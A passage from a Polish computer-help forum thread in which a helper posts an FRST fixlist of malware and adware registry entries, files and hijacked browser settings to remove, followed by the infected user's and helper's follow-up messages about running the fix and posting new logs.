    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [LCK8DF8V64WRGN0] => C:\Program Files\W5M8VVC41Z\W5M8VVC41.exe [1040384 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [avdrzeqtghj] => C:\Users\shenzai\AppData\Roaming\koqyvsaiayp\41rp2vfgvbd.exe [8192 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [6ATVXOA3HL03UZA] => C:\Program Files\MM5915986V\MM5915986.exe [1040384 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [IJ0EJJZFO34LO56] => C:\Program Files\1R2KLZCDR0\1R2KLZCDR.exe [1040384 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [J73XW9IBZ1E86E2] => C:\Program Files\G8P4KU1YKZ\G8P4KU1YK.exe [1040384 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [YeaDesktop] => C:\Program Files (x86)\YeaDesktop\YeaDesktop.exe [3513856 2017-06-13] () <===== UWAGA
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [msiql] => C:\Users\shenzai\AppData\Local\Temp\00009416\msiql.exe [2072576 2017-06-20] () <===== UWAGA
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: F - F:\Autorun.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: H - H:\setup.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: J - J:\setup.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {022c7a56-8870-11e5-85a6-bcaec582f204} - F:\setup.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {1c1b9931-1429-11e6-b560-bcaec582f204} - J:\setup.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {3d75d6bc-a5e7-11e6-b9b4-bcaec582f204} - I:\HTC_Sync_Manager_PC.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {40bf05a0-929f-11e5-a15b-bcaec582f204} - G:\setup.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {40eca389-0568-11e5-86c6-806e6f6e6963} - E:\SETUP.EXE
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {7370324e-b539-11e5-8408-bcaec582f204} - H:\setup.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {740b6ab8-2c4b-11e7-b47f-bcaec582f204} - F:\HiSuiteDownLoader.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {d6a9f553-0635-11e5-9899-bcaec582f204} - F:\HTC_Sync_Manager_PC.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {eec25d75-fb41-11e6-bb3c-bcaec582f204} - G:\HiSuiteDownLoader.exe
    HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2015-06-02] (Microsoft Corporation)
    ShellExecuteHooks: Brak nazwy - {5F51FFFE-7463-4220-B711-E5B9ACB8EDFE} - C:\ProgramData\igfxDH.dll [952832 2017-06-08] ()
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    ShellIconOverlayIdentifiers: [JzShlobj] -> {9A0700D2-920A-4E52-8697-9B5230C92612} => C:\Program Files (x86)\Maoha\JiSuZip\JZipExt.dll -> Brak pliku
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2016-08-24]
    ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe (McAfee, Inc.)
    Startup: C:\Users\shenzai\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMVU.lnk [2016-08-24]
    ShortcutTarget: IMVU.lnk -> (Brak pliku)
    GroupPolicy: Ograniczenia - Chrome <======= UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA
    Tcpip\..\Interfaces\{1E3853BB-0E67-481B-B902-F8BCB0DD6101}: [NameServer] 211.162.78.1,211.162.78.2
    URLSearchHook: HKLM-x32 -> Domyślne = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D}
    SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
    BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll => Brak pliku
    BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll [2014-04-09] (McAfee, Inc.)
    FF user.js: detected! => C:\Users\shenzai\AppData\Roaming\Mozilla\Firefox\Profiles\p8rrujta.default\user.js [2017-04-08]
    FF NewTab: Mozilla\Firefox\Profiles\p8rrujta.default -> hxxp://www-searching.com/?pid=s&s=H6Jzamo...39dd65-472c-4daf-8167-4380a9c726b7,&fnt=1
    FF Extension: (Tables) - C:\Users\shenzai\AppData\Roaming\Mozilla\Firefox\Profiles\p8rrujta.default\Extensions\378507@extcorp.net.xpi [2017-04-08]
    FF Extension: (Fast search) - C:\Users\shenzai\AppData\Roaming\Mozilla\Firefox\Profiles\p8rrujta.default\Extensions\amcontextmenu@loucypher [2017-06-19]
    FF SearchPlugin: C:\Users\shenzai\AppData\Roaming\Mozilla\Firefox\Profiles\p8rrujta.default\searchplugins\smod.xml [2017-06-19]
    FF HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi
    FF Extension: (McAfee Security Scan Plus) - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi [2014-04-04] [Brak podpisu cyfrowego]
    CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shyos&prd=set_ch&q={searchTerms}&s=H6Jzltpbl1BU,352dd3f7-2197-492d-aa2f-2f009ff1c68e,
    CHR DefaultSearchKeyword: Default -> www-searching.com
    CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
    CHR Extension: (Tables) - C:\Users\shenzai\AppData\Local\Google\Chrome\User Data\Default\Extensions\fngmhnnpilhplaeedifhccceomclgfbg [2017-06-19]
    OPR Extension: (Tables) - C:\Users\shenzai\AppData\Roaming\Opera Software\Opera Stable\Extensions\egafjhhpbipcmpoiomegbckljbbbphoj [2017-06-19]
    OPR Extension: (Fast search) - C:\Users\shenzai\AppData\Roaming\Opera Software\Opera Stable\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-06-19]
    R2 UCBrowserSvc; C:\Program Files (x86)\UCBrowser\Application\UCService.exe [599440 2017-03-07] () <==== UWAGA
    S2 JszipService; C:\Program Files (x86)\Maoha\JiSuZip\JszipSvc.exe [X]
    R1 cytdsk; C:\Windows\System32\drivers\cytdsk.sys [195496 2017-06-13] ()
    R1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== UWAGA
    U0 aswVmm; Brak ImagePath
    S3 EverestDriver; \??\C:\Users\shenzai\AppData\Local\Temp\EverestDriver.sys [X] <==== UWAGA
    S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
    S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
    S3 VGPU; System32\drivers\rdvgkmd.sys [X]
    2017-06-20 20:14 - 2017-06-20 20:14 - 00000000 ____D C:\ProgramData\Microleaves
    2017-06-20 20:13 - 2017-06-20 20:13 - 01623552 _____ C:\ProgramData\service.exe
    2017-06-20 20:13 - 2017-06-20 20:13 - 00024228 _____ C:\Windows\System32\Tasks\{7A797A47-040C-0C05-0E11-7E0B0C7F117F}
    2017-06-20 20:13 - 2017-06-20 20:13 - 00003572 _____ C:\Windows\System32\Tasks\System Healer Task
    2017-06-20 20:13 - 2017-06-20 20:13 - 00003248 _____ C:\Windows\System32\Tasks\SystemHealer Monitor
    2017-06-20 20:13 - 2017-06-20 20:13 - 00001055 _____ C:\Users\Public\Desktop\Launch System Healer.lnk
    2017-06-20 20:13 - 2017-06-20 20:13 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\System Healer
    2017-06-20 20:13 - 2017-06-20 20:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
    2017-06-20 20:13 - 2017-06-20 20:13 - 00000000 ____D C:\ProgramData\d9fc8263-7fb7-0
    2017-06-20 20:13 - 2017-06-20 20:13 - 00000000 ____D C:\ProgramData\d9fc8263-0ea7-1
    2017-06-20 20:13 - 2017-06-20 20:13 - 00000000 ____D C:\Program Files (x86)\SystemHealer
    2017-06-20 20:12 - 2017-06-20 20:24 - 00000342 _____ C:\Windows\Tasks\Online Application V2G3.job
    2017-06-20 20:12 - 2017-06-20 20:17 - 00000000 ____D C:\Program Files (x86)\YeaDesktop
    2017-06-20 20:12 - 2017-06-20 20:14 - 00000374 _____ C:\Windows\Tasks\Updater_Online_Application.job
    2017-06-20 20:12 - 2017-06-20 20:12 - 00003206 _____ C:\Windows\System32\Tasks\Updater_Online_Application
    2017-06-20 20:12 - 2017-06-20 20:12 - 00003170 _____ C:\Windows\System32\Tasks\Online Application V2G3
    2017-06-20 20:12 - 2017-06-20 20:12 - 00003170 _____ C:\Windows\System32\Tasks\Online Application V2G2
    2017-06-20 20:12 - 2017-06-20 20:12 - 00000000 ____D C:\Users\shenzai\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk
    2017-06-20 20:12 - 2017-06-20 20:12 - 00000000 ____D C:\Users\Public\Documents\XMUpdate
    2017-06-20 20:12 - 2017-06-20 20:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YeaDesktop
    2017-06-20 20:12 - 2017-06-20 20:12 - 00000000 ____D C:\Program Files (x86)\Microleaves
    2017-06-20 20:11 - 2017-06-20 20:24 - 00000342 _____ C:\Windows\Tasks\Online Application V2G2.job
    2017-06-20 20:11 - 2017-06-20 20:24 - 00000342 _____ C:\Windows\Tasks\Online Application V2G1.job
    2017-06-20 20:11 - 2017-06-20 20:11 - 00016684 _____ C:\Windows\System32\Tasks\MyReader
    2017-06-20 20:11 - 2017-06-20 20:11 - 00003170 _____ C:\Windows\System32\Tasks\Online Application V2G1
    2017-06-20 20:11 - 2017-06-20 20:11 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\Microleaves
    2017-06-20 20:11 - 2017-06-20 20:11 - 00000000 ____D C:\Users\shenzai\AppData\Local\jiobodfkmdffkcajblpbomgodflafoph
    2017-06-20 20:11 - 2017-06-20 20:11 - 00000000 ____D C:\Users\shenzai\AppData\Local\AdvinstAnalytics
    2017-06-20 20:11 - 2017-06-08 16:08 - 00952832 ___SH C:\ProgramData\igfxDH.dll
    2017-06-20 20:10 - 2017-06-20 20:11 - 00000000 ____D C:\Program Files\G8P4KU1YKZ
    2017-06-20 20:10 - 2017-06-20 20:11 - 00000000 ____D C:\Program Files\1R2KLZCDR0
    2017-06-20 20:10 - 2017-06-20 20:10 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\y5biuysevnl
    2017-06-20 20:10 - 2017-06-20 20:10 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\toczbv142yx
    2017-06-20 20:10 - 2017-06-20 20:10 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\koqyvsaiayp
    2017-06-20 20:10 - 2017-06-20 20:10 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\ghiuy3lhhxs
    2017-06-20 20:10 - 2017-06-20 20:10 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\dybmia1ijuv
    2017-06-20 20:10 - 2017-06-20 20:10 - 00000000 ____D C:\Program Files\W5M8VVC41Z
    2017-06-20 20:10 - 2017-06-20 20:10 - 00000000 ____D C:\Program Files\MM5915986V
    2017-06-20 20:10 - 2017-06-20 20:10 - 00000000 ____D C:\Program Files\4PBTGJC09T
    2017-06-20 16:17 - 2017-06-20 16:17 - 00285696 ____H C:\Windows\system32\BIT5FB1.tmp
    2017-06-20 16:17 - 2017-06-20 16:17 - 00285696 ____H C:\Windows\system32\BIT45E9.tmp
    2017-06-19 22:01 - 2017-06-20 20:15 - 00002562 _____ C:\Windows\System32\Tasks\UCBrowserUpdaterCore
    2017-06-19 22:01 - 2017-06-20 20:15 - 00000294 _____ C:\Windows\Tasks\UCBrowserUpdaterCore.job
    2017-06-19 22:00 - 2017-06-20 20:12 - 00003476 _____ C:\Windows\System32\Tasks\UCBrowserSecureUpdater
    2017-06-19 21:35 - 2017-06-20 20:12 - 00000979 _____ C:\Users\Public\Desktop\magicdisk.lnk
    2017-06-19 21:34 - 2017-06-19 21:34 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\s3hgbczwrde
    2017-06-19 21:34 - 2017-06-19 21:34 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\c0hqm2ldlwn
    2017-06-19 21:34 - 2017-06-19 21:34 - 00000000 ____D C:\Program Files\TKW87PQMG6
    2017-06-19 21:34 - 2017-06-19 21:34 - 00000000 ____D C:\Program Files\MUMESLMP8Z
    2017-06-19 21:33 - 2017-06-19 21:33 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\yry2vavm0el
    2017-06-19 21:33 - 2017-06-19 21:33 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\rqva4vu3i5j
    2017-06-19 21:33 - 2017-06-19 21:33 - 00000000 ____D C:\Program Files\UG6R5GFKJM
    2017-06-19 21:33 - 2017-06-19 21:33 - 00000000 ____D C:\Program Files\BOBQXDCZQA
    2017-06-19 21:22 - 2017-06-19 21:22 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\hrjq31jjr1s
    2017-06-19 21:22 - 2017-06-19 21:22 - 00000000 ____D C:\Program Files\5XR5VD3DZ9
    2017-06-19 21:21 - 2017-06-19 21:21 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\qpmxs3bw3ng
    2017-06-19 21:21 - 2017-06-19 21:21 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\qkbq50xf10b
    2017-06-19 21:21 - 2017-06-19 21:21 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\dz5uts4wvfd
    2017-06-19 21:21 - 2017-06-19 21:21 - 00000000 ____D C:\Program Files\393WNXK8JD
    2017-06-19 21:21 - 2017-06-19 21:21 - 00000000 ____D C:\Program Files\1RBOSEKT1M
    2017-06-19 21:10 - 2017-06-19 21:55 - 00000000 ____D C:\AdwCleaner
    2017-06-19 21:07 - 2017-06-19 21:42 - 00002812 _____ C:\Users\shenzai\Desktop\Rkill.txt
    2017-06-19 21:07 - 2017-06-19 21:07 - 01106888 _____ (Bleeping Computer, LLC) C:\Users\shenzai\Downloads\rkill64-32766.exe
    2017-06-19 21:07 - 2017-06-19 21:07 - 01106888 _____ (Bleeping Computer, LLC) C:\Users\shenzai\Downloads\rkill64.exe
    2017-06-19 21:07 - 2016-04-06 22:57 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\shenzai\Downloads\rkill.exe
    2017-06-19 21:05 - 2017-06-19 21:05 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\sugqxgvlxy5
    2017-06-19 21:05 - 2017-06-19 21:05 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\q05qybgj5jq
    2017-06-19 21:05 - 2017-06-19 21:05 - 00000000 ____D C:\Program Files\ISQS1Z69P0
    2017-06-19 21:05 - 2017-06-19 21:05 - 00000000 ____D C:\Program Files\93I1LBPZ1T
    2017-06-19 21:04 - 2017-06-19 21:04 - 00912452 _____ C:\Users\shenzai\Downloads\rkill (2).zip
    2017-06-19 21:04 - 2017-06-19 21:04 - 00912452 _____ C:\Users\shenzai\Downloads\rkill (1).zip
    2017-06-19 21:03 - 2017-06-19 21:04 - 00912452 _____ C:\Users\shenzai\Downloads\rkill.zip
    2017-06-19 20:34 - 2017-06-19 20:34 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\zmzrs3tx0wf
    2017-06-19 20:34 - 2017-06-19 20:34 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\nura0dmmhpv
    2017-06-19 20:34 - 2017-06-19 20:34 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\ldmagzil55c
    2017-06-19 20:34 - 2017-06-19 20:34 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\fhzrd0gttza
    2017-06-19 20:34 - 2017-06-19 20:34 - 00000000 ____D C:\Program Files\XC5Z0BU2Y6
    2017-06-19 20:34 - 2017-06-19 20:34 - 00000000 ____D C:\Program Files\WRTZITNY23
    2017-06-19 20:34 - 2017-06-19 20:34 - 00000000 ____D C:\Program Files\SR251QB9FR
    2017-06-19 20:30 - 2017-06-19 20:54 - 00003162 _____ C:\Windows\System32\Tasks\0b5c76bb7599252601fe688dbc063f23
    2017-06-19 20:23 - 2017-06-20 20:27 - 00016708 _____ C:\Windows\System32\Tasks\Kaypall Phone
    2017-06-19 20:15 - 2017-06-19 20:15 - 00000000 ____D C:\Program Files\BLWC39Q0E4
    2017-06-19 20:14 - 2017-06-19 20:14 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\qeqzfuxunch
    2017-06-19 20:14 - 2017-06-19 20:14 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\e43xx11teho
    2017-06-19 20:14 - 2017-06-19 20:14 - 00000000 ____D C:\Program Files\R8BW7C91AT
    2017-06-19 20:13 - 2017-06-19 20:13 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\fycv4iesk2e
    2017-06-19 20:13 - 2017-06-19 20:13 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\1s2rv3j1a2i
    2017-06-19 20:13 - 2017-06-19 20:13 - 00000000 ____D C:\Program Files\JBLV5TJ2Z1
    2017-06-19 19:33 - 2017-06-19 19:33 - 00000000 ____D C:\Program Files\V3HHTTJHKZ
    2017-06-19 19:33 - 2017-06-19 19:33 - 00000000 ____D C:\Program Files\4W8VSVFL0W
    2017-06-19 19:32 - 2017-06-19 19:32 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\tepzay5bj1y
    2017-06-19 19:32 - 2017-06-19 19:32 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\k2gnjykm5ii
    2017-06-19 19:31 - 2017-06-19 19:31 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\matll4qacsu
    2017-06-19 19:31 - 2017-06-19 19:31 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\ldcqlyuiywt
    2017-06-19 19:31 - 2017-06-19 19:31 - 00000000 ____D C:\Program Files\J7OD4XH1PR
    2017-06-19 19:24 - 2017-06-19 19:24 - 07307264 _____ C:\Users\shenzai\AppData\Local\agent.dat
    2017-06-19 19:24 - 2017-06-19 19:24 - 01896509 _____ C:\Users\shenzai\AppData\Local\Silmattom.tst
    2017-06-19 19:24 - 2017-06-19 19:24 - 00126464 _____ C:\Users\shenzai\AppData\Local\noah.dat
    2017-06-19 19:24 - 2017-06-19 19:24 - 00070800 _____ C:\Users\shenzai\AppData\Local\Config.xml
    2017-06-19 19:24 - 2017-06-19 19:24 - 00018432 _____ C:\Users\shenzai\AppData\Local\Main.dat
    2017-06-19 19:24 - 2017-06-19 19:24 - 00005568 _____ C:\Users\shenzai\AppData\Local\md.xml
    2017-06-19 19:24 - 2017-06-19 19:24 - 00000000 ____D C:\Users\shenzai\AppData\Local\UCBrowser
    2017-06-19 19:24 - 2017-06-19 19:22 - 02465280 _____ (TODO: <Company name>) C:\Users\shenzai\AppData\Local\Silmattom.exe
    2017-06-19 19:23 - 2017-06-19 19:24 - 00000000 ____D C:\Program Files (x86)\UCBrowser
    2017-06-19 19:23 - 2017-06-19 19:23 - 00278509 _____ C:\Users\shenzai\AppData\Local\Medron.bin
    2017-06-19 19:22 - 2017-06-19 20:55 - 00000000 ____D C:\Program Files (x86)\BZip
    2017-06-19 19:22 - 2017-06-19 19:35 - 01705984 _____ C:\Users\shenzai\AppData\Local\po.db
    2017-06-19 19:22 - 2017-06-19 19:27 - 00000000 ____D C:\Program Files (x86)\Retreive
    2017-06-19 19:22 - 2017-06-19 19:22 - 00930816 _____ C:\Users\shenzai\AppData\Local\test_db_cara.db
    2017-06-19 19:22 - 2017-06-19 19:22 - 00140800 _____ C:\Users\shenzai\AppData\Local\installer.dat
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\ub1iemx3kwf
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\kvkbvqhhk1u
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\fmbsrdwt5cy
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\4nnus0vhemn
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Program Files\UYIF6DU5IU
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Program Files\O825X73I2W
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Program Files\9CNCLV5VH3
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Program Files\7VF1CV9KEO
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Program Files\2CDSOXRAHX
    2017-06-19 19:21 - 2017-06-20 20:12 - 00000000 ____D C:\Program Files (x86)\mgdisk
    2017-06-19 19:21 - 2017-06-19 20:14 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\IeMiss2
    2017-06-19 19:21 - 2017-06-19 19:22 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\irqehcq4yo1
    2017-06-19 19:21 - 2017-06-19 19:22 - 00000000 ____D C:\Program Files\MG7Q0GZCFX
    2017-06-19 19:21 - 2017-06-19 19:22 - 00000000 ____D C:\Program Files (x86)\bcztbxttabt
    2017-06-19 19:21 - 2017-06-19 19:22 - 00000000 ____D C:\Program Files (x86)\af5eu2vwtg0
    2017-06-19 19:21 - 2017-06-19 19:21 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\ytiwsjabqud
    2017-06-19 19:21 - 2017-06-19 19:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mgdisk
    2017-06-19 19:20 - 2017-06-19 19:21 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\55manmergvu
    2017-06-19 19:20 - 2017-06-19 19:21 - 00000000 ____D C:\Program Files\H07RWKZIGX
    2017-06-19 19:20 - 2017-06-19 19:20 - 00117760 _____ C:\Windows\Manager.exe
    2017-06-17 06:23 - 2017-06-17 06:23 - 01126912 _____ C:\Windows\0bdbacc6a094c8dfe3ab91092151c1c4.exe
    2017-06-17 06:23 - 2017-06-17 06:23 - 00051630 _____ C:\Windows\uninstaller.dat
    2017-06-13 04:26 - 2017-06-13 04:26 - 00195496 _____ C:\Windows\system32\Drivers\cytdsk.sys
    2016-07-20 18:57 - 2016-07-20 18:57 - 0000016 _____ () C:\ProgramData\mntemp
    2017-06-20 20:13 - 2017-06-20 20:13 - 1623552 _____ () C:\ProgramData\service.exe
    C:\ProgramData\igfxDH.dll
    C:\ProgramData\service.exe
    EmptyTemp:

    W FRST wybierz Napraw.

    W razie problemow uruchom FRST z poziomu WinRe:
    https://www.fixitpc.pl/topic/4414-diagnostyka-infekcji-na-niestartujących-windows/

    Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

    0
  • #3 20 Cze 2017 22:46
    nataszka663
    Poziom 2  

    Usunęłam programy, o których napisałeś. Po wykonaniu fix'a nie pojawiły się na nowo, niestety wirus wciąż nie został usunięty. Oto RTS wykonane po fix'ie. (Tym razem komputer pyta o zezwolenie otworzenia wirusa jako administrator, jednak nawet kiedy daje "nie" to i tak się otwiera, jednak nie tak natarczywie jak wcześniej). Czy uruchomić ADVCleaner'a i wysłać również raport?

    EDIT
    W razie czego załączam również raport.

    Scaliłem. RADU23

    0
  • Pomocny post
    #4 21 Cze 2017 07:50
    Kolobos
    Spec od komputerów

    Wykonaj podany wczesniej Fixlist z poziomu WinRe, nastepnie wykonaj go jeszcze raz juz z trybu normalnego pod Windows, po wykonaniu zamiesc nowe logi z FRST, ze skanowania razem z Fixlog.

    W Addition nadal widze AVG TuneUp, a mial byc odinstalowany.

    0
  • #6 22 Cze 2017 15:14
    Kolobos
    Spec od komputerów

    Znowu zamiescilas stary log: Uruchmiony przez shenzai (administrator) NATUCHNA (20-06-2017 21:46:17)

    Zamiesc nowe logi, razem z nowym addition.

    0